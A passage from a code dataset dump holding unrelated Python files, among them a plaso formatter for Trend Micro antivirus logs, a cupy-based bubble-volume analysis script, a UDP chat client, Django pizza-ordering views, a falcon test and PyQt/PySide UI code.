interface\nfrom plaso.formatters import manager\n\n\nclass OfficeScanVirusDetectionLogEventFormatter(\n interface.ConditionalEventFormatter):\n \"\"\"Formatter for a Trend Micro Office Scan Virus Detection Log event.\"\"\"\n\n DATA_TYPE = 'av:trendmicro:scan'\n\n FORMAT_STRING_PIECES = [\n 'Path: {path}',\n 'File name: {filename}',\n '{threat}',\n ': {action}',\n '({scan_type})']\n\n FORMAT_STRING_SHORT_PIECES = [\n '{path}',\n '{filename}',\n '{action}']\n\n SOURCE_LONG = 'Trend Micro Office Scan Virus Detection Log'\n SOURCE_SHORT = 'LOG'\n\n _SCAN_RESULTS = {\n 0: \"Success (clean)\",\n 1: \"Success (move)\",\n 2: \"Success (delete)\",\n 3: \"Success (rename)\",\n 4: \"Pass > Deny access\",\n 5: \"Failure (clean)\",\n 6: \"Failure (move)\",\n 7: \"Failure (delete)\",\n 8: \"Failure (rename)\",\n 10: \"Failure (clean), moved\",\n 11: \"Failure (clean), deleted\",\n 12: \"Failure (clean), renamed\",\n 13: \"Pass > Deny access\",\n 14: \"Failure (clean), move also failed\",\n 15: \"Failure (clean), delete also failed\",\n 16: \"Failure (clean), rename also failed\",\n 25: \"Passed a potential security risk\"\n }\n\n _SCAN_TYPES = {\n 0: \"Manual scan\",\n 1: \"Real-time scan\",\n 2: \"Scheduled scan\",\n 3: \"Scan Now scan\",\n 4: \"DCS scan\"\n }\n\n def __init__(self):\n \"\"\"Initializes a Trend Micro Virus Log event format helper.\"\"\"\n super(OfficeScanVirusDetectionLogEventFormatter, self).__init__()\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='action',\n output_attribute='action', values=self._SCAN_RESULTS)\n\n self.helpers.append(helper)\n\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='scan_type',\n output_attribute='scan_type', values=self._SCAN_TYPES)\n\n self.helpers.append(helper)\n\n\nclass OfficeScanWebReputationLogEventFormatter(\n interface.ConditionalEventFormatter):\n \"\"\"Formatter for a Trend Micro Office Scan Virus Detection Log event.\"\"\"\n\n DATA_TYPE = 'av:trendmicro:webrep'\n\n FORMAT_STRING_PIECES = [\n '{url}',\n '{ip}',\n 'Group: {group_name}',\n '{group_code}',\n 'Mode: {block_mode}',\n 'Policy ID: {policy_identifier}',\n 'Credibility rating: {credibility_rating}',\n 'Credibility score: {credibility_score}',\n 'Threshold value: {threshold}',\n 'Accessed by: {application_name}']\n\n FORMAT_STRING_SHORT_PIECES = [\n '{url}',\n '{group_name}']\n\n SOURCE_LONG = 'Trend Micro Office Scan Virus Detection Log'\n SOURCE_SHORT = 'LOG'\n\n _BLOCK_MODES = {\n 0: \"Internal filter\",\n 1: \"Whitelist only\"\n }\n\n def __init__(self):\n \"\"\"Initializes a Trend Micro Virus Log event format helper.\"\"\"\n super(OfficeScanWebReputationLogEventFormatter, self).__init__()\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='block_mode',\n output_attribute='block_mode', values=self._BLOCK_MODES)\n\n self.helpers.append(helper)\n\n\nmanager.FormattersManager.RegisterFormatters([\n OfficeScanVirusDetectionLogEventFormatter,\n OfficeScanWebReputationLogEventFormatter])\n","sub_path":"plaso/formatters/trendmicroav.py","file_name":"trendmicroav.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"624576031","text":"import cc3d\nimport numpy as np\nimport cupy as cp\nimport pandas as pd\nfrom scipy.interpolate import griddata\nimport datetime\nimport math\n\nlabels_in = []\nVmatrix = []\nalphaMatrix = []\nXmatrix = []\nYmatrix = []\nZmatrix = []\nprint(datetime.datetime.now())\n\nboxTextReadFromPandas = pd.read_csv('6barFine.csv')\nxi = boxTextReadFromPandas['Points:1'].min()\nxx = boxTextReadFromPandas['Points:1'].max()\nyi = boxTextReadFromPandas['Points:2'].min()\nyx = boxTextReadFromPandas['Points:2'].max()\n\nprint(xi, xx, yi, yx)\n\nThread_value = 0.005\ngridvalue = 1e-4\n\nwith open('cc3d.csv', 'w') as newfile:\n newfile.write(\"delimeter,Volumn,meanx,meany,meanz\\n\")\n \n GroupBy = boxTextReadFromPandas.groupby(\"Points:0\")\n GroupNum = len(GroupBy)\n for num, partdividedbyPointZ in enumerate(GroupBy):\n # print(num,partdividedbyPointZ[0])\n partdividedbyPointZ = partdividedbyPointZ[1].to_numpy()\n\n points = partdividedbyPointZ[:, [4,5]]\n alpah_liquid = partdividedbyPointZ[:, 1]\n V = partdividedbyPointZ[:, 0]\n X = partdividedbyPointZ[:, 4]\n Y = partdividedbyPointZ[:, 5]\n Z = partdividedbyPointZ[:, 3]\n grid_x, grid_y = np.mgrid[xi:xx:gridvalue, yi:yx:gridvalue]\n grid_z = griddata(points, alpah_liquid, (grid_x, grid_y), method='nearest')\n grid_alpha = griddata(points, alpah_liquid, (grid_x, grid_y), method='nearest')\n grid_V = griddata(points, V, (grid_x, grid_y), method='nearest')\n grid_corx = griddata(points, X, (grid_x, grid_y), method='nearest')\n grid_cory = griddata(points, Y, (grid_x, grid_y), method='nearest')\n grid_corz = griddata(points, Z, (grid_x, grid_y), method='nearest')\n grid_z[grid_z < Thread_value] = 0\n grid_z[grid_z >= Thread_value] = 1\n grid_z = grid_z.astype(np.int32)\n\n if num % 1000 == 0:\n print(datetime.datetime.now(), (num + 1) / GroupNum)\n grid_z = cp.asarray(grid_z)\n if cp.sum(grid_z) == 0:\n\n labels_in = np.asarray(labels_in)\n\n if np.sum(labels_in) == 0:\n labels_in = []\n Vmatrix = []\n alphaMatrix = []\n Xmatrix = []\n Ymatrix = []\n Zmatrix = []\n continue\n\n # Vmatrix = np.power(np.asarray(Vmatrix),1/3)\n labels_out = cc3d.connected_components(labels_in)\n N = np.max(labels_out)\n for segid in range(1, N + 1):\n # calculate delimeter\n Vmatrix = cp.asarray(Vmatrix)\n alphaMatrix = cp.asarray(alphaMatrix)\n tmpMatrix = cp.asarray(labels_out == segid)\n sumtmpMatrix = cp.multiply(Vmatrix, cp.multiply(alphaMatrix, tmpMatrix))\n sumVolumn = cp.sum(sumtmpMatrix) # sum of Volumn\n sumVolumnDelimeter = math.pow(sumVolumn * 6 / np.pi, 1 / 3)\n\n # coordinate\n Xmatrix = cp.asarray(Xmatrix)\n Ymatrix = cp.asarray(Ymatrix)\n Zmatrix = cp.asarray(Zmatrix)\n meanx = cp.sum(cp.multiply(Xmatrix, sumtmpMatrix)) / sumVolumn\n meany = cp.sum(cp.multiply(Ymatrix, sumtmpMatrix)) / sumVolumn\n meanz = cp.sum(cp.multiply(Zmatrix, sumtmpMatrix)) / sumVolumn\n # write into file\n newfile.write(str(sumVolumnDelimeter)\n + ',' + str(sumVolumn)\n + ',' + str(meanx)\n + ',' + str(meany)\n + ',' + str(meanz)\n + '\\n')\n\n labels_out = []\n labels_in = []\n alphaMatrix = []\n Vmatrix = []\n Xmatrix = []\n Ymatrix = []\n Zmatrix = []\n else:\n labels_in.append(grid_z.tolist())\n alphaMatrix.append(grid_alpha.tolist())\n Vmatrix.append(grid_V.tolist())\n Xmatrix.append(grid_corx.tolist())\n Ymatrix.append(grid_cory.tolist())\n Zmatrix.append(grid_corz.tolist())\n\nprint(datetime.datetime.now())\n","sub_path":"ccl_test4cc3d_cupy_6bar.py","file_name":"ccl_test4cc3d_cupy_6bar.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"122124111","text":"# -*- coding: utf-8 -*-\nfrom PySide import QtGui, QtCore\n\n\nclass WorkAreaUI(QtGui.QDialog):\n def __init__(self, parent=None):\n super(WorkAreaUI, self).__init__(parent)\n self.setWindowTitle(\"Work Area\")\n self.setWindowFlags(QtCore.Qt.Dialog | QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowMinimizeButtonHint)\n main_layout = QtGui.QHBoxLayout(self)\n main_layout.setContentsMargins(0, 0, 0, 0)\n main_splitter = QtGui.QSplitter(QtCore.Qt.Horizontal)\n main_layout.addWidget(main_splitter)\n # left layout\n left_widget = QtGui.QFrame()\n left_layout = QtGui.QVBoxLayout(left_widget)\n # _project layout\n project_layout = QtGui.QHBoxLayout()\n project_label = QtGui.QLabel(\"Project\")\n project_label.setFixedWidth(35)\n self.project_cbox = QtGui.QComboBox()\n project_layout.addWidget(project_label)\n project_layout.addWidget(self.project_cbox)\n # _tree layout\n tree_grp = QtGui.QGroupBox(\"Tasks\")\n tree_layout = QtGui.QVBoxLayout(tree_grp)\n self.tree_view = QtGui.QTreeView()\n tree_layout.addWidget(self.tree_view)\n self.tree_view.setHeaderHidden(True)\n self.model = QtGui.QStandardItemModel()\n update_layout = QtGui.QHBoxLayout()\n self.update_btn = QtGui.QPushButton(\"Refresh\")\n update_layout.addStretch()\n update_layout.addWidget(self.update_btn)\n tree_layout.addLayout(update_layout)\n left_layout.addLayout(project_layout)\n left_layout.addWidget(tree_grp)\n # right layout\n right_widget = QtGui.QFrame()\n right_layout = QtGui.QVBoxLayout(right_widget)\n # _work area\n work_area_group = QtGui.QGroupBox(\"Work File\")\n work_area_layout = QtGui.QVBoxLayout(work_area_group)\n # _path line edit\n path_layout = QtGui.QHBoxLayout()\n path_label = QtGui.QLabel(\"Path\")\n path_label.setFixedWidth(25)\n self.path_le = QtGui.QLineEdit()\n path_layout.addWidget(path_label)\n path_layout.addWidget(self.path_le)\n self.work_file_list_widget = QtGui.QListWidget()\n work_area_layout.addLayout(path_layout)\n work_area_layout.addWidget(self.work_file_list_widget)\n # local work area\n local_work_area_group = QtGui.QGroupBox(\"Local Work File\")\n local_work_area_layout = QtGui.QVBoxLayout(local_work_area_group)\n # _path line edit\n local_path_layout = QtGui.QHBoxLayout()\n local_path_label = QtGui.QLabel(\"Path\")\n local_path_label.setFixedWidth(25)\n self.local_path_le = QtGui.QLineEdit()\n self.open_local_btn = QtGui.QPushButton(\"Open\")\n self.open_local_btn.setFixedWidth(35)\n local_path_layout.addWidget(local_path_label)\n local_path_layout.addWidget(self.local_path_le)\n local_path_layout.addWidget(self.open_local_btn)\n self.local_work_file_list_widget = QtGui.QListWidget()\n # _local work btn layout\n local_work_btn_layout = QtGui.QHBoxLayout()\n self.refresh_btn = QtGui.QPushButton(\"Refresh\")\n self.start_btn = QtGui.QPushButton(\"Start\")\n self.open_btn = QtGui.QPushButton(\"Open\")\n local_work_btn_layout.addStretch()\n local_work_btn_layout.addWidget(self.refresh_btn)\n local_work_btn_layout.addWidget(self.start_btn)\n local_work_btn_layout.addWidget(self.open_btn)\n local_work_area_layout.addLayout(local_path_layout)\n local_work_area_layout.addWidget(self.local_work_file_list_widget)\n local_work_area_layout.addLayout(local_work_btn_layout)\n\n right_layout.addWidget(work_area_group)\n right_layout.addWidget(local_work_area_group)\n\n main_splitter.insertWidget(0, left_widget)\n main_splitter.insertWidget(1, right_widget)\n main_splitter.setSizes([250, 350])\n\n\ndef main():\n pass\n","sub_path":"miraScripts/pipeTools/workarea/workarea_ui.py","file_name":"workarea_ui.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"224831636","text":"import socket\nimport threading\n\nprint('\\nWelcome to kechat!')\nprint('\\n-----------------------------------------------------')\nprint(r'Enter \"\\users\" to view a list of online users')\nprint(r'Enter \"\\e[username] [text]\" to send private message')\nprint('-----------------------------------------------------\\n')\n\ndef read_soket():\n while True:\n data = sock.recv(1024)\n print(data.decode())\nserver = '', 8000\nalias = input('Enter you name: ')\nsock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nsock.bind(('', 0))\nsock.sendto((alias + ' <= join to chat!').encode(), server)\nthread_1 = threading.Thread(target = read_soket)\nthread_1.start()\nwhile True:\n message = input()\n if r'\\users' in message:\n sock.sendto((message).encode(), server)\n elif r'\\e' in message:\n sock.sendto(('Message from ' + str(alias) + ': ' \n + message).encode(), server)\n else:\n sock.sendto((alias + ': '+message).encode(), server)","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"131202208","text":"from django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login, authenticate, logout\nfrom .models import FoodType, Size, Topping, BasePrice, ToppingPrice, Order, ShoppingCart\nfrom django.core import serializers\nfrom django.views.decorators.http import require_http_methods\nfrom django.contrib import messages\n\n# USER VIEWS\ndef index(request):\n if request.user.is_authenticated:\n if request.method == \"GET\":\n # get dishes from menu model and render them\n context = {\n \"food_type\": FoodType.objects.all()\n }\n return render(request, \"index.html\", context)\n\n if request.method == \"POST\":\n # get user, food_type, and food category\n username = request.user\n food_type_id = request.POST[\"food_type\"]\n food_type_id = food_type_id.split(':')[0]\n food_category = FoodType.objects.get(id=food_type_id).category\n base = FoodType.objects.get(id=food_type_id).base\n print(f\"From client got: {username}, {food_type_id}, {food_category}, base: {base}\")\n\n # get base price\n if any(x in food_category for x in [\"Pizza\", \"Sub\", \"Dinner Platters\"]):\n size = request.POST[\"size\"]\n else:\n size = \"Regular\"\n\n print(f\"size: {size}\")\n\n size_id = Size.objects.get(size=size.split(',')[0]).id\n base_price = BasePrice.objects.get(food_id=food_type_id,size=size_id).price\n\n # get toppings price if necessary\n if \"toppings\" in request.POST:\n toppings = request.POST.getlist(\"toppings\")\n print(f\"toppings: {toppings}\")\n if \"Pizza\" in food_category and not \"Special\" in base:\n topping_price = ToppingPrice.objects.get(food=food_type_id,size_id=size_id,topping_num=len(toppings)).price\n elif \"Sub\" in food_category:\n topping_price = ToppingPrice.objects.get(food=food_type_id,topping_num=len(toppings)).price\n else:\n topping_price = 0\n else:\n topping_price = 0\n\n order_price=base_price+topping_price\n print(f\"order price is: ${order_price}\")\n\n # create order in model\n order = Order(username=username, food_type_id=food_type_id, size_id=size_id, order_price=order_price)\n order.save()\n\n if any(x in food_category for x in [\"Pizza\", \"Sub\"]):\n toppings = Topping.objects.filter(topping__in=toppings)\n # print(toppings)\n order.toppings.set(toppings)\n\n # create shopping cart or add order to shopping cart\n if not ShoppingCart.objects.filter(username=username, status=\"unconfirmed\"):\n\n # create shopping cart if none created\n shopping_cart = ShoppingCart(username=username, total_price=order_price, status=\"unconfirmed\")\n shopping_cart.save()\n shopping_cart.orders.add(order)\n\n else:\n # add order to shopping cart\n shopping_cart = ShoppingCart.objects.get(username=username, status=\"unconfirmed\")\n shopping_cart.orders.add(order)\n old_total_price = shopping_cart.total_price\n shopping_cart.total_price = old_total_price + order_price\n shopping_cart.save()\n\n messages.success(request, \"Your order has been successfully added to the shopping cart\")\n\n return HttpResponseRedirect(reverse(\"index\"))\n\n else:\n return HttpResponseRedirect(reverse(\"login\"), {\"message\": \"please login before making an order\"})\n\n\ndef shopping_cart(request):\n\n if request.user.is_authenticated:\n\n # get orders\n username = request.user\n orders = Order.objects.filter(username=username, shoppingcart__status=\"unconfirmed\")\n\n try:\n shopping_cart = ShoppingCart.objects.get(username=username, status=\"unconfirmed\")\n print(shopping_cart)\n except ShoppingCart.DoesNotExist:\n shopping_cart = None\n\n if request.method == \"GET\":\n\n # pass orders and total_price to context\n if shopping_cart:\n\n print(shopping_cart)\n context = {\n \"orders\": orders,\n \"total_price\": shopping_cart.total_price,\n \"shopping_cart\": shopping_cart\n }\n\n return render(request, \"shopping_cart.html\", context)\n\n else:\n print(\"No shopping cart\")\n return render(request, \"shopping_cart.html\", {\"message\": \"You have no items in the shopping cart yet\"})\n\n if request.method == \"POST\":\n\n # check if user succesfully pressed confirm order button\n if request.POST[\"order_confirmed\"]==\"confirmed\":\n\n shopping_cart.status = \"pending\"\n shopping_cart.save()\n\n return render(request, \"shopping_cart.html\", {\"message\": \"Your order has been sent to Pinnochio's Pizzas & Subs\"})\n else:\n return HttpResponseRedirect(reverse(\"shopping_cart\"), {\"message\": \"there was an error submitting your order, please contact Pinnochio's or try again\"})\n else:\n return HttpResponseRedirect(reverse(\"login\"), {\"message\": \"please login before making an order\"})\n\n\ndef your_orders(request):\n if request.user.is_authenticated:\n\n username=request.user\n shopping_carts = ShoppingCart.objects.filter(username=username).exclude(status=\"unconfirmed\")\n\n if request.method == \"GET\":\n\n # pass shopping_cart to context\n context = {\n \"shopping_carts\": shopping_carts\n }\n\n return render(request, \"your_orders.html\", context)\n else:\n return HttpResponseRedirect(reverse(\"login\"), {\"message\": \"please login before making an order\"})\n\n\n# send menu options to client\n@require_http_methods([\"POST\"])\ndef load_sizes(request):\n\n # get selected choice and obtain food id\n choice = request.POST['food_choice']\n print(f\"received food choice from client: {choice}\")\n food_id = choice.split(':')[0]\n\n # construct json object with size and price via food id\n sizes_query = BasePrice.objects.filter(food=food_id)\n print(f\"converted size and price to query: {sizes_query}\")\n sizes_json = serializers.serialize(\"json\", sizes_query, use_natural_foreign_keys=True, use_natural_primary_keys=True, fields=[\"size\",\"price\"])\n print(f\"converted size and price to json: {sizes_json}\")\n\n # insert size and prices in json object for HttpResponse\n data = {\n \"sizes\": sizes_json\n }\n return JsonResponse(data)\n\n\n# send menu options to client\n@require_http_methods([\"POST\"])\ndef load_toppings(request):\n\n # get selected food choice and obtain food id\n food_choice = request.POST['food_choice']\n size_choice = request.POST['size_choice']\n print(f\"received food choice: {food_choice}\")\n print(f\"received size choice: {size_choice}\")\n\n if size_choice:\n size_id = Size.objects.get(size=size_choice).id\n\n food_choice_id = food_choice.split(':')[0]\n\n # construct json object with toppings\n toppings_query = FoodType.objects.filter(id=food_choice_id)\n print(f\"about to send toppings query: {toppings_query}\")\n\n toppings_json = serializers.serialize(\"json\", toppings_query, use_natural_foreign_keys=True, use_natural_primary_keys=True, fields=[\"toppings\",\"price\"])\n print(f\"about to send toppings json: {toppings_json}\")\n\n # construct json object with toppings' prices\n if size_choice:\n if \"Pizza\" in food_choice:\n toppings_prices_query = ToppingPrice.objects.filter(food=food_choice_id,size_id=size_id)\n else:\n toppings_prices_query = ToppingPrice.objects.filter(food=food_choice_id)\n print(f\"about to send toppings prices query 1: {toppings_prices_query}\")\n else:\n toppings_prices_query = ToppingPrice.objects.filter(food=food_choice_id)\n print(f\"about to send toppings prices query 2: {toppings_prices_query}\")\n\n toppings_prices_json = serializers.serialize(\"json\", toppings_prices_query, use_natural_foreign_keys=True, use_natural_primary_keys=True, fields=[\"topping_num\",\"price\"])\n print(f\"about to send toppings prices json: {toppings_prices_json}\")\n\n # insert topping and prices in json object for HttpResponse\n data = {\n # get toppings and prices\n \"toppings\": toppings_json,\n \"toppings_prices\": toppings_prices_json\n }\n\n return JsonResponse(data)\n\n# ADMIN VIEWS\n# Display all the users orders to admin users\ndef users_orders(request):\n\n if request.user.is_authenticated and request.user.is_superuser:\n # get shopping carts, excluding those that are unconfirmed\n shopping_carts = ShoppingCart.objects.exclude(status=\"unconfirmed\")\n print(f\"GOT USERS ORDERS FROM DB: {shopping_carts}\")\n status_choices = ShoppingCart.status_choices\n\n # pass data to context\n context = {\n \"shopping_carts\": shopping_carts,\n \"status_choices\": status_choices\n }\n\n return render(request, \"users_orders.html\", context)\n\n# change the status of the shopping cart\n@require_http_methods([\"POST\"])\ndef change_cart_status(request):\n if request.user.is_superuser:\n # get client values\n cart_id = request.POST[\"cart_id\"]\n status_selected = request.POST[\"status_selected\"]\n\n # change status to unconfirmed only if no unconfirmed carts exists as no more than one unconfirmed cart can exist per user\n if ShoppingCart.objects.filter(username=request.user, status=\"unconfirmed\").count()>=1:\n data = {\"message\": \"User already has orders in the shopping cart, delete the other cart first to change the status\"}\n\n # change shopping cart status\n else:\n shopping_cart = ShoppingCart.objects.get(id=cart_id)\n print(f\"OLD SHOPPING CART STATUS: {shopping_cart}\")\n shopping_cart.status = status_selected\n shopping_cart.save()\n print(f\"new shopping cart status: {ShoppingCart.objects.get(id=cart_id)}\")\n # pass success message to client\n data = {\"message\": \"Shopping cart with id \"+cart_id+\", changed status succesfully to \"+status_selected}\n\n return JsonResponse(data)\n\n# USER AUTH FUNCTIONS\n# Register view\ndef register_view(request):\n\n # check if user if authenticated\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"), {\"message\": \"user is already registered, logout to register another username\"})\n\n # get form info via POST\n if request.method == \"POST\":\n first_name = request.POST[\"first_name\"]\n last_name = request.POST[\"last_name\"]\n email = request.POST[\"email\"]\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n password_check = request.POST[\"password_check\"]\n\n\n # server-side check of form inputs: input of all fields and successful password check\n if not first_name or not last_name or not email or not username or not password or not password_check:\n return render(request, \"register.html\", {\"message\": \"please enter all required fields\"})\n elif password!=password_check:\n return render(request, \"register.html\", {\"message\": \"passwords don't match\"})\n\n # check if username or email exists\n try:\n duplicate_username = User.objects.get(username=username)\n duplicate_email = User.objects.get(email=email)\n return render(request, \"register.html\", {\"message\": \"username and/or email already exists\"})\n\n except User.DoesNotExist:\n # create user and commit to database\n user = User.objects.create_user(username=username, first_name=first_name, last_name=last_name, email=email, password=password)\n user.save()\n\n # login user and redirect to index\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"), {\"message\": \"user registered\"})\n\n else:\n return render(request, \"register.html\")\n\n\n# Login view\ndef login_view(request):\n\n if request.method == \"POST\":\n # get form info via POST\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n\n user = authenticate(request, username = username, password = password)\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"login.html\", {\"message\": \"invalid credentials\"})\n\n else:\n return render(request, \"login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return render(request, \"login.html\", {\"message\": \"user logged out\"})\n\n# Logout view\n","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"175145449","text":"\nimport falcon\nimport falcon.testing as testing\n\n\nclass TestResponseBody(testing.TestBase):\n\n def test_append_body(self):\n text = \"Hello beautiful world! \"\n resp = falcon.Response()\n resp.body = \"\"\n\n for token in text.split():\n resp.body += token\n resp.body += \" \"\n\n self.assertEqual(resp.body, text)\n\n def test_redirect(self):\n resp = falcon.Response()\n resp.redirect('http://localhost/anything')\n self.assertEqual(resp.status, \"303 See Other\")\n self.assertEqual(resp._headers['Location'], 'http://localhost/anything')\n\n def test_redirect_permanent(self):\n resp = falcon.Response()\n resp.redirect('http://localhost/anything', permanent=True)\n self.assertEqual(resp.status, \"301 Moved Permanently\")\n self.assertEqual(resp._headers['Location'], 'http://localhost/anything')\n\n","sub_path":"tests/test_response_body.py","file_name":"test_response_body.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"498807001","text":"##############################################################################\n#\n# Copyright (c) 2002 Zope Corporation and Contributors. All Rights Reserved.\n\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\n\n\"\"\"\nClose properly the <input /> tag\n\"\"\"\n\nimport ZTUtils.Zope\nfrom ZTUtils.Zope import complex_marshal\nimport cgi\n\ndef make_hidden_input(*args, **kwargs):\n '''Construct a set of hidden input elements, with marshalling markup.\n\n If there are positional arguments, they must be dictionaries.\n They are combined with the dictionary of keyword arguments to form\n a dictionary of query names and values.\n\n Query names (the keys) must be strings. Values may be strings,\n integers, floats, or DateTimes, and they may also be lists or\n namespaces containing these types. All arguments are marshalled with\n complex_marshal().\n '''\n\n d = {}\n for arg in args:\n d.update(arg)\n d.update(kwargs)\n\n hq = lambda x:cgi.escape(x, quote=True)\n qlist = complex_marshal(d.items())\n for i in range(len(qlist)):\n k, m, v = qlist[i]\n qlist[i] = ('<input type=\"hidden\" name=\"%s%s\" value=\"%s\" />'\n % (hq(k), m, hq(str(v))))\n\n return '\\n'.join(qlist)\n\nZTUtils.Zope.make_hidden_input = make_hidden_input\nZTUtils.make_hidden_input = make_hidden_input\n\n","sub_path":"product/ERP5Type/patches/make_hidden_input.py","file_name":"make_hidden_input.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"413307571","text":"import os, sys, shutil, glob\nimport time, datetime\nimport math, random\nfrom taggedimage import TaggedImage\nfrom augmentation import AugmentedImage, build_all_possible_augs\n\nclass ImageSet(object):\n\n\tdef __init__(self):\n\t\tself.images = []\n\t\tself.augumented_images = []\n\n\tdef load_arr(self, arr):\n\t\tfor i in arr:\n\t\t\tself.images.append(i)\n\t\tself.augumented_images = []\n\n\tdef load_dir(self, dirpath, whichstick=\"default\", loadaugs = False):\n\t\tg = glob.glob(os.path.join(dirpath, \"*.jpg\"))\n\t\tarr = []\n\t\tfor fname in g:\n\t\t\tarr.append(TaggedImage(fname, whichstick))\n\t\tif loadaugs:\n\t\t\taug_arr = []\n\t\t\tad = glob.glob(os.path.join(dirpath, \"aug_*\"))\n\t\t\taug_name = os.path.basename(ad)[4:]\n\t\t\tflip = AUG_FLIP in aug_name\n\t\t\tfor d in ad:\n\t\t\t\tg = glob.glob(os.path.join(d, \"*.jpg\"))\n\t\t\t\tfor fname in g:\n\t\t\t\t\ti = TaggedImage(fname, whichstick, flip)\n\t\t\t\t\taug_arr.append(i)\n\t\t\tself.augumented_images = aug_arr\n\t\tself.images = arr\n\n\tdef sort(self, reverse=False):\n\t\tself.images.sort(key=lambda x: x.sequence, reverse=reverse)\n\t\tself.augumented_images.sort(key=lambda x: x.sequence, reverse=reverse)\n\n\tdef shuffle(self):\n\t\trandom.shuffle(self.images)\n\t\trandom.shuffle(self.augumented_images)\n\n\tdef get_subset(self, every, offset, invert=False, allow_aug=False):\n\t\ti = 0\n\t\tj = 0\n\t\tcnt1 = len(self.images)\n\t\tif allow_aug:\n\t\t\tcnt2 = len(self.augumented_images)\n\t\telse:\n\t\t\tcnt2 = 0\n\t\tcnt = cnt1 + cnt2\n\t\tarr = []\n\t\twhile i < cnt and j < cnt:\n\t\t\tj = i + offset\n\t\t\tto_add = False\n\t\t\tif (j % every) == 0:\n\t\t\t\tto_add = True\n\t\t\tif invert:\n\t\t\t\tto_add = not to_add\n\t\t\tif to_add:\n\t\t\t\tif j < cnt1:\n\t\t\t\t\tarr.append(self.images[j])\n\t\t\t\telif j < cnt and allow_aug:\n\t\t\t\t\tarr.append(self.augumented_images[j - cnt1])\n\t\t\ti += 1\n\t\tnew_set = ImageSet()\n\t\tnew_set.load_arr(arr)\n\t\treturn new_set\n\n\tdef augment_all(self, aug_list, transform = False):\n\t\tj = 0\n\t\tfor i in self.images:\n\t\t\taimg = AugmentedImage(i.fpath, whichstick = i.whichstick, xform = transform)\n\t\t\tfor aug in aug_list:\n\t\t\t\taimg.augment(aug)\n\t\t\t\taimg.save()\n\t\t\t\taimg.reload()\n\t\t\t\tj += 1\n\t\t\t\tprint(\"Saved %d %s %s\" % (j, aug, aimg.fname))\n\n\tdef augment_all_possibilities(self, transform = False):\n\t\tpossibilities = build_all_possible_augs()\n\t\tself.augment_all(possibilities, transform = transform)\n\n\tdef copy_to(self, dirpath):\n\t\ttry:\n\t\t\tos.makedirs(dirpath)\n\t\texcept FileExistsError:\n\t\t\tpass\n\t\tfor f in self.images:\n\t\t\ttry:\n\t\t\t\tshutil.copyfile(f.fpath, os.path.join(dirpath, f.fname))\n\t\t\texcept Exception as ex:\n\t\t\t\tprint(\"Exception copying file '%s' to '%s', error: %s\" % (f.fpath, dirpath, str(ex)))\n\n\tdef save_to(self, dirpath, xform=False):\n\t\tfor f in self.images:\n\t\t\tif xform:\n\t\t\t\tf.transform()\n\t\t\tf.save_to(dirpath)","sub_path":"sloth/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"23667523","text":"class Matrix:\n def __init__(self, row, col, data):\n self.row=row\n self.col=col\n self.data=data\n\n def __add__(self, other):\n res = Matrix(2,2,[[0,0],[0,0]])\n for r in range(self.row):\n for c in range(self.col):\n res.data[r][c] = self.data[r][c] + other.data[r][c]\n return res\n \n def __str__(self):\n return str(self.data)\n \ndata = [[1,2],[3,4]]\nmat1=Matrix(2,2,data)\ndata = [[2,4],[6,8]]\nmat2=Matrix(2,2,data)\n\nmat3 = mat1 + mat2\nprint(mat3)\n","sub_path":"Python/연산자 중복 정의.py","file_name":"연산자 중복 정의.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"624461949","text":"import sys\r\nimport zmq\r\nimport subprocess\r\nimport os\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QLabel\r\nfrom PyQt5.QtCore import QThread, pyqtSignal\r\n\r\nimport config\r\n\r\nfrom Ui_mainwindow import Ui_mainWindow \r\nfrom Ui_monitorWindow import Ui_Monitor\r\n\r\nfrom serial_manager import SerialManager\r\nfrom console import ConsoleWidget\r\n\r\n\r\nclass AppWindow(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.ui = 